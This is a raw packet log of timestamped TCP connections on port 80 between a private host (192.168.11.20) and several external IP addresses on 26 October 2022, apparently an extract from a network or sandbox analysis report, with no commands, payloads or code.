Oct 26, 2022 13:20:50.860831976 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.860944986 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.861098051 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:51.829687119 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.845480919 CEST	49943	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.857054949 CEST	80	49943	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:52.857326031 CEST	49943	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.857459068 CEST	49943	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.868191957 CEST	80	49943	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:52.868273973 CEST	80	49943	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:52.868372917 CEST	80	49943	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:52.868588924 CEST	49943	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.868693113 CEST	49943	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:52.879417896 CEST	80	49943	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:57.903410912 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:57.914067984 CEST	80	49944	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:57.914253950 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:57.914378881 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:57.925205946 CEST	80	49944	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:57.930967093 CEST	80	49944	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:57.931018114 CEST	80	49944	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:57.931062937 CEST	80	49944	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:57.931265116 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:57.931265116 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:58.922046900 CEST	49944	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:59.937695026 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:59.948822975 CEST	80	49945	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:59.949038982 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:59.949137926 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:59.960005045 CEST	80	49945	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:59.963478088 CEST	80	49945	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:59.963535070 CEST	80	49945	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:59.963581085 CEST	80	49945	76.223.105.230	192.168.11.20
Oct 26, 2022 13:20:59.963701963 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:20:59.963762045 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:00.952816010 CEST	49945	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.968480110 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.979454994 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.979650021 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.980170965 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.980242968 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.980297089 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.991309881 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991369963 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991420984 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991499901 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.991538048 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991570950 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.991581917 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991621971 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.991622925 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991767883 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991808891 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991808891 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.991847992 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.991887093 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.992016077 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.992144108 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.992300034 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:01.996449947 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.996509075 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:01.996717930 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.002651930 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.002710104 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.002824068 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.002834082 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.002970934 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.002971888 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.003144026 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003192902 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.003282070 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003324032 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003365993 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003403902 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003442049 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003525019 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.003549099 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003588915 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003627062 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003664970 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003698111 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.003825903 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003865957 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003904104 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003942013 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.003981113 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014175892 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014235020 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014276028 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014525890 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014584064 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014887094 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.014944077 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.015068054 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.015114069 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.015153885 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.015383959 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.015440941 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.016525030 CEST	80	49946	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:02.016668081 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:02.983623028 CEST	49946	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:03.999181032 CEST	49947	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:04.009427071 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:04.009622097 CEST	49947	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:04.009713888 CEST	49947	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:04.020421982 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:04.025944948 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:04.025955915 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:04.025965929 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:04.026813030 CEST	49947	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:04.027781963 CEST	49947	80	192.168.11.20	76.223.105.230
Oct 26, 2022 13:21:04.038460016 CEST	80	49947	76.223.105.230	192.168.11.20
Oct 26, 2022 13:21:09.220046997 CEST	49948	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:09.349663019 CEST	80	49948	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:09.350013018 CEST	49948	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:09.350013018 CEST	49948	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:09.479625940 CEST	80	49948	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:09.479736090 CEST	80	49948	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:09.479782104 CEST	80	49948	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:09.479971886 CEST	49948	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:10.357013941 CEST	49948	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:11.372637987 CEST	49949	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:11.502280951 CEST	80	49949	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:11.502626896 CEST	49949	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:11.502743959 CEST	49949	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:11.632412910 CEST	80	49949	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:11.632514954 CEST	80	49949	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:11.632571936 CEST	80	49949	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:11.632757902 CEST	49949	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:12.512746096 CEST	49949	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.528615952 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.657023907 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.657247066 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.657840014 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.657902956 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.786436081 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786524057 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786575079 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786621094 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786652088 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.786716938 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786729097 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.786789894 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.786832094 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786875010 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786912918 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.786955118 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.786955118 CEST	49950	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:13.915214062 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915304899 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915317059 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915416956 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915540934 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915549994 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915642023 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915759087 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915884018 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:13.915891886 CEST	80	49950	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:15.684261084 CEST	49951	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:15.813632965 CEST	80	49951	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:15.813868999 CEST	49951	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:15.814035892 CEST	49951	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:15.942960978 CEST	80	49951	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:15.943078041 CEST	80	49951	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:15.943150997 CEST	80	49951	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:15.943413973 CEST	49951	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:15.943515062 CEST	49951	80	192.168.11.20	198.252.105.91
Oct 26, 2022 13:21:16.072282076 CEST	80	49951	198.252.105.91	192.168.11.20
Oct 26, 2022 13:21:20.948971987 CEST	49952	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:21.128498077 CEST	80	49952	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:21.128828049 CEST	49952	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:21.128828049 CEST	49952	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:21.308692932 CEST	80	49952	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:21.308912039 CEST	49952	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:22.135621071 CEST	49952	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:23.151782036 CEST	49953	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:23.330868006 CEST	80	49953	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:23.331255913 CEST	49953	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:23.331255913 CEST	49953	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:23.510648966 CEST	80	49953	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:23.510905027 CEST	49953	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:24.338388920 CEST	49953	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.353869915 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.530720949 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.531475067 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.532049894 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.532084942 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.532130957 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.709044933 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.709101915 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.709146023 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.709270954 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.709340096 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.709358931 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.709359884 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.709614038 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.709793091 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.886416912 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886527061 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886604071 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886672974 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886710882 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.886756897 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886821032 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:25.886851072 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.886945009 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:25.887211084 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.064260960 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.064419985 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.064492941 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.064555883 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.064670086 CEST	80	49954	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:26.540956020 CEST	49954	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:27.556809902 CEST	49955	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:27.738379002 CEST	80	49955	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:27.738722086 CEST	49955	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:27.738840103 CEST	49955	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:27.920660019 CEST	80	49955	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:27.921004057 CEST	49955	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:27.921089888 CEST	49955	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:21:28.102217913 CEST	80	49955	207.60.131.46	192.168.11.20
Oct 26, 2022 13:21:32.949016094 CEST	49956	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:32.960683107 CEST	80	49956	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:32.960900068 CEST	49956	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:32.960971117 CEST	49956	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:32.972187996 CEST	80	49956	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:32.973880053 CEST	80	49956	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:32.973943949 CEST	80	49956	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:32.974154949 CEST	49956	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:33.976747036 CEST	49956	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:34.992432117 CEST	49957	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:35.004086018 CEST	80	49957	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:35.004259109 CEST	49957	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:35.004374027 CEST	49957	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:35.015459061 CEST	80	49957	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:35.016572952 CEST	80	49957	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:35.016630888 CEST	80	49957	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:35.016829014 CEST	49957	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:36.007584095 CEST	49957	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.023161888 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.034543991 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.035698891 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.035926104 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.036020041 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.046895027 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.047121048 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.047271013 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.047419071 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.047859907 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.047935009 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048064947 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048158884 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048226118 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.048290014 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048403978 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.048444033 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048516035 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048693895 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.048800945 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.049068928 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.049278021 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.058227062 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.058316946 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.058360100 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.058424950 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.058552027 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.058718920 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.059206009 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.059400082 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.059448957 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.059518099 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.059616089 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:37.059979916 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.060224056 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.060551882 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.069381952 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.069669008 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.069684029 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.070149899 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.070415020 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.070544958 CEST	80	49958	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:37.070678949 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:38.038594961 CEST	49958	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.054227114 CEST	49959	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.065987110 CEST	80	49959	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:39.066144943 CEST	49959	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.066283941 CEST	49959	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.077393055 CEST	80	49959	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:39.077461958 CEST	80	49959	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:39.077507019 CEST	80	49959	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:39.077724934 CEST	49959	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.077884912 CEST	49959	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:21:39.089001894 CEST	80	49959	3.64.163.50	192.168.11.20
Oct 26, 2022 13:21:44.093842983 CEST	49960	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:44.286072016 CEST	80	49960	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:44.286446095 CEST	49960	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:44.286525965 CEST	49960	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:44.479038000 CEST	80	49960	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:44.482527971 CEST	80	49960	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:44.482614994 CEST	80	49960	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:44.483072996 CEST	49960	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:45.286905050 CEST	49960	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:46.302413940 CEST	49961	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:46.495778084 CEST	80	49961	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:46.495949984 CEST	49961	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:46.496068001 CEST	49961	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:46.689318895 CEST	80	49961	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:46.693427086 CEST	80	49961	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:46.693501949 CEST	80	49961	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:46.694108009 CEST	49961	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:47.505486012 CEST	49961	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.520840883 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.717087030 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.717334032 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.717897892 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.718020916 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.914346933 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914458036 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914536953 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914589882 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.914609909 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914685965 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914689064 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.914761066 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914834023 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914904118 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.914920092 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.914973974 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.915045977 CEST	80	49962	162.214.80.106	192.168.11.20
Oct 26, 2022 13:21:48.915055037 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.915262938 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:48.915386915 CEST	49962	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:21:49.110956907 CEST	80	49962	162.214.80.106	192.168.11.20
